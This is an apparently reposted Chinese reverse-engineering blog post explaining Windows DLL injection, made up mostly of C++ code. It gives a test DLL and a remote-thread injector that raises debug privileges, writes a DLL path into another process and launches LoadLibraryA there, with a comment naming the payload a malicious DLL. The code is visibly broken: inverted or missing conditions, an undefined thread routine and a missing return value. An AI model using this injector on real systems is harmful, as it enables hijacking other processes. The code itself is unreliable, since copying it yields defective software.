【Reverse】DLL注入
阿新 • • 發佈:2021-10-25
DLL注入就是將dll貼上到指定的程序空間中,通過dll狀態觸發目標事件
DLL使用
必備函式
HINSTANCE LoadLibrary(
LPCTSTR lpLibFileName);
返回值】成功則返回模組控制代碼,失敗返回NULL
流程
-
建立一個DLL專案
DLL程式碼
// dllmain.cpp : 定義 DLL 應用程式的入口點。 #include "pch.h" #include<windows.h> BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { MessageBox(NULL,TEXT("Hacker"),TEXT("DLL Inject"),MB_OK); HANDLE hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL); CHAR ErrorCode[100]; sprintf(ErrorCode,"%d",(int)GetLastError()); MessageBox(NULL, (LPCWSTR)ErrorCode, TEXT("DLL Inject"), MB_OK); if (hThread) { MessageBox(NULL, TEXT("Success"), TEXT("DLL Inject"), MB_OK); CloseHandle(hThread); } break; } case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } -
通過LoadLibrary動態呼叫DLL
關鍵程式碼HANDLE hModule = ::LoadLibrary("injectDll.dll"); -
獲取DLL中的函式
FARPROC GetProcAddress( HMODULE hModule, LPCWSTR lpProcName); Parameters將模組控制代碼和函式名傳入,成功則返回目標函式控制代碼,失敗返回NULL
遠端執行緒注入
必備函式
HANDLE CreateRemoteThread( HANDLE hProcess, // handle to process LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD SIZE_T dwStackSize, // initial stack size LPTHREAD_START_ROUTINE lpStartAddress, // thread function LPVOID lpParameter, // thread argument DWORD dwCreationFlags, // creation option LPDWORD lpThreadId // thread identifier );
//向指定程序的指定空間寫入資料
BOOL WriteProcessMemory(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPVOID lpBuffer,
DWORD nSize,
LPDWORD lpNumberOfBytesWritten );
```
//在指定程序中申請一片記憶體
LPVOID VirtualAllocEx(
HANDLE hProcess, // process to allocate memory
LPVOID lpAddress, // desired starting address
SIZE_T dwSize, // size of region to allocate
DWORD flAllocationType, // type of allocation
DWORD flProtect // type of access protection
);
```
```
// remoteInjectDLLTEST.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include<windows.h>
#include<cstdio>
VOID ShowError(PCHAR msg)
{
printf("%s Error --Code:%d\n", msg, GetLastError());
}
BOOL InjectDll(DWORD dwPid,CHAR szDllName[]){
HANDLE hProcess = NULL,hRemoteThread = NULL;
HMODULE hKernel32 = NULL;
DWORD dwSize = 0;
LPVOID pDllPathAddr = NULL;
PVOID pLoadLibraryAddr = NULL;
BOOL bRet = FALSE;
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);
if(hProcess){
ShowError("OpenProcess");
bRet = FALSE;
goto exit;
}
//申請DLL名稱的記憶體空間
dwSize = strlen(szDllName) + 1;
pDllPathAddr = VirtualAllocEx(hProcess,NULL,dwSize,MEM_COMMIT,PAGE_READWRITE); //在指定的程序中分配記憶體空間
{
ShowError("VirtualAllocEx");
bRet = FALSE;
goto exit;
}
// 把DLL完整路徑名寫入程序中
if (!WriteProcessMemory(hProcess, pDllPathAddr, szDllName, dwSize, NULL))
{
ShowError("WriteProcessMemory");
bRet = FALSE;
goto exit;
}
hKernel32 = LoadLibrary("Kernel32.dll");
{
ShowError("LoadLibrary");
bRet = FALSE;
goto exit;
}
// 獲取LoadLibraryA函式地址
pLoadLibraryAddr = GetProcAddress(hKernel32, "LoadLibraryA");
if (pLoadLibraryAddr == NULL)
{
ShowError("GetProcAddress ");
bRet = FALSE;
goto exit;
}
//建立遠端執行緒進行DLL注入
hRemoteThread = CreateRemoteThread(hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)pLoadLibraryAddr,
pDllPathAddr, 0, NULL);
if (hRemoteThread == NULL)
{
ShowError("CreateRemoteThread");
bRet = FALSE;
goto exit;
}
exit:
if(hKernel32) FreeLibrary(hKernel32);
if(hProcess) CloseHandle(hProcess);
if(hRemoteThread) CloseHandle(hRemoteThread);
}
void enableDebugPriv()
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
return;
}
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
{
CloseHandle(hToken);
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL))
{
CloseHandle(hToken);
return;
}
}
int main(int argc, char* argv[])
{
enableDebugPriv(); //Inhance Privilege
InjectDll(788,"E:\\Code\\injectDll\\Release\\injectDll.dll"); //選擇需要注入的程序,選中惡意DLL
return 0;
}
```